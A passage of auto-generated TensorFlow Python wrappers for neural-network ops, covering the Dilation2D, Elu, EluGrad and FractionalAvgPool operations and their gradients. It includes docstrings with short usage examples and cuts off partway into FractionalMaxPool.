_attr_T, _inputs_T = _execute.args_to_matching_eager([filter, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(filter, out_backprop) = _inputs_T
input_sizes = _ops.convert_to_tensor(input_sizes, _dtypes.int32)
_inputs_flat = [input_sizes, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
_result = _execute.execute(b"DepthwiseConv2dNativeBackpropInput", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def dilation2d(input, filter, strides, rates, padding, name=None):
r"""Computes the grayscale dilation of 4-D `input` and 3-D `filter` tensors.
The `input` tensor has shape `[batch, in_height, in_width, depth]` and the
`filter` tensor has shape `[filter_height, filter_width, depth]`, i.e., each
input channel is processed independently of the others with its own structuring
function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the output
tensor depend on the `padding` algorithm. We currently only support the default
"NHWC" `data_format`.
In detail, the grayscale morphological 2-D dilation is the max-sum correlation
(for consistency with `conv2d`, we use unmirrored filters):
output[b, y, x, c] =
max_{dy, dx} input[b,
strides[1] * y + rates[1] * dy,
strides[2] * x + rates[2] * dx,
c] +
filter[dy, dx, c]
Max-pooling is a special case when the filter has size equal to the pooling
kernel size and contains all zeros.
Note on duality: The dilation of `input` by the `filter` is equal to the
negation of the erosion of `-input` by the reflected `filter`.
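  For illustration, a minimal eager-mode sketch using the raw op exported
  below (with an all-zero filter, dilation reduces to plain max pooling):
      import tensorflow as tf
      x = tf.reshape(tf.range(16.0), [1, 4, 4, 1])  # [batch, h, w, depth]
      k = tf.zeros([2, 2, 1])                       # zero structuring function
      y = tf.raw_ops.Dilation2D(input=x, filter=k, strides=[1, 1, 1, 1],
                                rates=[1, 1, 1, 1], padding="VALID")
      # y[0, :, :, 0] is the stride-1 2x2 max-pool of x.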
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filter: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the input
tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
The input stride for atrous morphological dilation. Must be:
`[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Dilation2D", name, input, filter, "strides", strides, "rates",
rates, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return dilation2d_eager_fallback(
input, filter, strides=strides, rates=rates, padding=padding,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Dilation2D", input=input, filter=filter, strides=strides,
rates=rates, padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "rates", _op.get_attr("rates"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Dilation2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Dilation2D = tf_export("raw_ops.Dilation2D")(_ops.to_raw_op(dilation2d))
def dilation2d_eager_fallback(input, filter, strides, rates, padding, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "rates", rates, "padding",
padding)
_result = _execute.execute(b"Dilation2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Dilation2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def dilation2d_backprop_filter(input, filter, out_backprop, strides, rates, padding, name=None):
r"""Computes the gradient of morphological 2-D dilation with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filter: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Dilation2DBackpropFilter", name, input, filter, out_backprop,
"strides", strides, "rates", rates, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return dilation2d_backprop_filter_eager_fallback(
input, filter, out_backprop, strides=strides, rates=rates,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_filter' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Dilation2DBackpropFilter", input=input, filter=filter,
out_backprop=out_backprop,
strides=strides, rates=rates,
padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "rates", _op.get_attr("rates"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Dilation2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Dilation2DBackpropFilter = tf_export("raw_ops.Dilation2DBackpropFilter")(_ops.to_raw_op(dilation2d_backprop_filter))
def dilation2d_backprop_filter_eager_fallback(input, filter, out_backprop, strides, rates, padding, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_filter' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "rates", rates, "padding",
padding)
_result = _execute.execute(b"Dilation2DBackpropFilter", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Dilation2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def dilation2d_backprop_input(input, filter, out_backprop, strides, rates, padding, name=None):
r"""Computes the gradient of morphological 2-D dilation with respect to the input.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filter: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Dilation2DBackpropInput", name, input, filter, out_backprop,
"strides", strides, "rates", rates, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return dilation2d_backprop_input_eager_fallback(
input, filter, out_backprop, strides=strides, rates=rates,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_input' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Dilation2DBackpropInput", input=input, filter=filter,
out_backprop=out_backprop, strides=strides,
rates=rates, padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "rates", _op.get_attr("rates"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Dilation2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Dilation2DBackpropInput = tf_export("raw_ops.Dilation2DBackpropInput")(_ops.to_raw_op(dilation2d_backprop_input))
def dilation2d_backprop_input_eager_fallback(input, filter, out_backprop, strides, rates, padding, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_input' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "rates", rates, "padding",
padding)
_result = _execute.execute(b"Dilation2DBackpropInput", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Dilation2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.elu')
def elu(features, name=None):
r"""Computes exponential linear: `exp(features) - 1` if < 0, `features` otherwise.
  See [Fast and Accurate Deep Network Learning by Exponential Linear Units
  (ELUs)](http://arxiv.org/abs/1511.07289)
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
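  For illustration, a minimal eager-mode sketch (via the public `tf.nn.elu`
  wrapper exported above):
      import tensorflow as tf
      tf.nn.elu([-1.0, 0.0, 2.0])
      # ~= [exp(-1.0) - 1.0, 0.0, 2.0] = [-0.63212..., 0.0, 2.0]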
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Elu", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return elu_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
elu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Elu", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
elu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Elu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Elu = tf_export("raw_ops.Elu")(_ops.to_raw_op(elu))
def elu_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Elu", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Elu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def elu_grad(gradients, outputs, name=None):
r"""Computes gradients for the exponential linear (Elu) operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding Elu operation.
outputs: A `Tensor`. Must have the same type as `gradients`.
The outputs of the corresponding Elu operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
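  Since elu(x) = exp(x) - 1 for x < 0, its derivative there is exp(x), i.e.
  outputs + 1; so the result is gradients * (outputs + 1) where outputs < 0
  and gradients elsewhere.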
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "EluGrad", name, gradients, outputs)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return elu_grad_eager_fallback(
gradients, outputs, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"EluGrad", gradients=gradients, outputs=outputs, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"EluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
EluGrad = tf_export("raw_ops.EluGrad")(_ops.to_raw_op(elu_grad))
def elu_grad_eager_fallback(gradients, outputs, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, outputs], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, outputs) = _inputs_T
_inputs_flat = [gradients, outputs]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"EluGrad", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"EluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_FractionalAvgPoolOutput = collections.namedtuple(
"FractionalAvgPool",
["output", "row_pooling_sequence", "col_pooling_sequence"])
def fractional_avg_pool(value, pooling_ratio, pseudo_random=False, overlapping=False, deterministic=False, seed=0, seed2=0, name=None):
r"""Performs fractional average pooling on the input.
  Fractional average pooling is similar to fractional max pooling in the pooling
region generation step. The only difference is that after pooling regions are
generated, a mean operation is performed instead of a max operation in each
pooling region.
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length `>= 4`.
      Pooling ratio for each dimension of `value`. Currently only the row
      and col dimensions are supported, and each ratio must be >= 1.0. For
      example, a valid pooling ratio looks like [1.0, 1.44, 1.73, 1.0]. The
      first and last elements must be 1.0 because we don't allow pooling on
      the batch and channels dimensions; 1.44 and 1.73 are the pooling
      ratios on the height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`.
      When set to True, generates the pooling sequence in a pseudorandom
      fashion, otherwise in a random fashion. See [Benjamin Graham,
      Fractional Max-Pooling](http://arxiv.org/abs/1412.6071) for the
      difference between pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`.
      When set to True, the values at the boundary of adjacent pooling
      cells are used by both cells. For example:
      `index 0 1 2 3 4`
      `value 20 5 16 3 7`
      If the pooling sequence is [0, 2, 4], then 16, at index 2, will be
      used twice. The result would be [41/3, 26/3] for fractional avg
      pooling.
deterministic: An optional `bool`. Defaults to `False`.
      When set to True, a fixed pooling region will be used when
      iterating over a FractionalAvgPool node in the computation graph.
      Mainly used in unit tests to make FractionalAvgPool deterministic.
seed: An optional `int`. Defaults to `0`.
      If either seed or seed2 is set to be non-zero, the random number
generator is seeded by the given seed. Otherwise, it is seeded by a
random seed.
seed2: An optional `int`. Defaults to `0`.
      A second seed to avoid seed collision.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, row_pooling_sequence, col_pooling_sequence).
output: A `Tensor`. Has the same type as `value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
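  For illustration, a minimal eager-mode sketch using the raw op exported
  below (`deterministic=True` with fixed seeds keeps the pooling regions
  stable across runs):
      import tensorflow as tf
      out = tf.raw_ops.FractionalAvgPool(
          value=tf.random.uniform([1, 6, 6, 1]),
          pooling_ratio=[1.0, 1.5, 1.5, 1.0],
          deterministic=True, seed=1, seed2=1)
      # out.output should have shape [1, 4, 4, 1], since 6 / 1.5 = 4.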
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalAvgPool", name, value, "pooling_ratio",
pooling_ratio, "pseudo_random", pseudo_random, "overlapping",
overlapping, "deterministic", deterministic, "seed", seed, "seed2",
seed2)
_result = _FractionalAvgPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_avg_pool_eager_fallback(
value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed,
seed2=seed2, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_avg_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalAvgPool", value=value, pooling_ratio=pooling_ratio,
pseudo_random=pseudo_random,
overlapping=overlapping,
deterministic=deterministic, seed=seed,
seed2=seed2, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("pooling_ratio", _op.get_attr("pooling_ratio"), "pseudo_random",
_op._get_attr_bool("pseudo_random"), "overlapping",
_op._get_attr_bool("overlapping"), "deterministic",
_op._get_attr_bool("deterministic"), "seed",
_op._get_attr_int("seed"), "seed2", _op._get_attr_int("seed2"),
"T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalAvgPool", _inputs_flat, _attrs, _result)
_result = _FractionalAvgPoolOutput._make(_result)
return _result
FractionalAvgPool = tf_export("raw_ops.FractionalAvgPool")(_ops.to_raw_op(fractional_avg_pool))
def fractional_avg_pool_eager_fallback(value, pooling_ratio, pseudo_random, overlapping, deterministic, seed, seed2, name, ctx):
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_avg_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_attr_T, (value,) = _execute.args_to_matching_eager([value], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
_inputs_flat = [value]
_attrs = ("pooling_ratio", pooling_ratio, "pseudo_random", pseudo_random,
"overlapping", overlapping, "deterministic", deterministic, "seed", seed,
"seed2", seed2, "T", _attr_T)
_result = _execute.execute(b"FractionalAvgPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalAvgPool", _inputs_flat, _attrs, _result)
_result = _FractionalAvgPoolOutput._make(_result)
return _result
def fractional_avg_pool_grad(orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping=False, name=None):
r"""Computes gradient of the FractionalAvgPool function.
  Unlike FractionalMaxPoolGrad, we don't need to find arg_max for
  FractionalAvgPoolGrad; we just evenly back-propagate each element of
  out_backprop to the indices that form the same pooling cell. Therefore, we
  only need to know the shape of the original input tensor, instead of the
  whole tensor.
Args:
orig_input_tensor_shape: A `Tensor` of type `int64`.
Original input tensor shape for `fractional_avg_pool`
out_backprop: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
4-D with shape `[batch, height, width, channels]`. Gradients
w.r.t. the output of `fractional_avg_pool`.
row_pooling_sequence: A `Tensor` of type `int64`.
      Row pooling sequence, used together with col_pooling_sequence to
      form the pooling regions.
    col_pooling_sequence: A `Tensor` of type `int64`.
      Column pooling sequence, used together with row_pooling_sequence to
      form the pooling regions.
overlapping: An optional `bool`. Defaults to `False`.
      When set to True, the values at the boundary of adjacent pooling
      cells are used by both cells. For example:
      `index 0 1 2 3 4`
      `value 20 5 16 3 7`
      If the pooling sequence is [0, 2, 4], then 16, at index 2, will be
      used twice. The result would be [41/3, 26/3] for fractional avg
      pooling.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `out_backprop`.
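  For example, if a pooling cell covers three input elements and receives an
  out_backprop value of 6, each of the three elements is credited 6/3 = 2.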
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalAvgPoolGrad", name, orig_input_tensor_shape,
out_backprop, row_pooling_sequence, col_pooling_sequence,
"overlapping", overlapping)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_avg_pool_grad_eager_fallback(
orig_input_tensor_shape, out_backprop, row_pooling_sequence,
col_pooling_sequence, overlapping=overlapping, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalAvgPoolGrad", orig_input_tensor_shape=orig_input_tensor_shape,
out_backprop=out_backprop,
row_pooling_sequence=row_pooling_sequence,
col_pooling_sequence=col_pooling_sequence,
overlapping=overlapping, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("overlapping", _op._get_attr_bool("overlapping"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalAvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FractionalAvgPoolGrad = tf_export("raw_ops.FractionalAvgPoolGrad")(_ops.to_raw_op(fractional_avg_pool_grad))
def fractional_avg_pool_grad_eager_fallback(orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping, name, ctx):
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_attr_T, (out_backprop,) = _execute.args_to_matching_eager([out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
orig_input_tensor_shape = _ops.convert_to_tensor(orig_input_tensor_shape, _dtypes.int64)
row_pooling_sequence = _ops.convert_to_tensor(row_pooling_sequence, _dtypes.int64)
col_pooling_sequence = _ops.convert_to_tensor(col_pooling_sequence, _dtypes.int64)
_inputs_flat = [orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence]
_attrs = ("overlapping", overlapping, "T", _attr_T)
_result = _execute.execute(b"FractionalAvgPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalAvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_FractionalMaxPoolOutput = collections.namedtuple(
"FractionalMaxPool",
["output", "row_pooling_sequence", "col_pooling_sequence"])
def fractional_max_pool(value, pooling_ratio, pseudo_random=False, overlapping=False, deterministic=False, seed=0, seed2=0, name=None):
r"""Performs fractional max pooling on the input.
  Fractional max pooling is slightly different from regular max pooling. In
  regular max pooling, you downsize an input set by taking the maximum value
  of smaller N x N subsections of the set (often 2x2), reducing the set by a
  factor of N, where N is an integer. Fractional max pooling, as you might
  expect from the word "fractional", means that the overall reduction ratio N
  does not have to be an integer.
The sizes of the pooling regions are generated randomly but are fairly uniform.
  For example, let's look at the height dimension, and the constraints on the
  list of rows that will be the pool boundaries.
First we define the following:
1. input_row_length : the number of rows from the input set
  2. output_row_length : the number of rows in the output, which will be smaller than the input
3. alpha = input_row_length / output_row_length : our reduction ratio
4. K = floor(alpha)
5. row_pooling_sequence : this is the result list of pool boundary rows
Then, row_pooling_sequence should satisfy:
1. a[0] = 0 : the first value of the sequence is 0
  2. a[end] = input_row_length : the last value of the sequence is the input size
  3. K <= (a[i+1] - a[i]) <= K+1 : all intervals have size K or K+1
4. length(row_pooling_sequence) = output_row_length+1
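  For example, with input_row_length = 6 and output_row_length = 4, we get
  alpha = 1.5 and K = 1, and [0, 1, 3, 4, 6] is one valid
  row_pooling_sequence: it starts at 0, ends at 6, every interval has size K
  or K+1, and its length is output_row_length + 1 = 5.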
For more details on fractional max pooling, see this paper:
[Benjamin Graham, Fractional Max-Pooling](http://arxiv.org/abs/1412.6071)
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length `>= 4`.
      Pooling ratio for each dimension of `value`. Currently only the row
      and col dimensions are supported, and each ratio must be >= 1.0. For
      example, a valid pooling ratio looks like [1.0, 1.44, 1.73, 1.0]. The
      first and last elements must be 1.0 because we don't allow pooling on
      the batch and channels dimensions; 1.44 and 1.73 are the pooling
      ratios on the height and width dimensions respectively.
pseudo_random: An optional `bool`. Defaults to `False`.
      When set to True, generates the pooling sequence in a pseudorandom
      fashion, otherwise in a random fashion. See [Benjamin Graham,
      Fractional Max-Pooling](http://arxiv.org/abs/1412.6071) for the
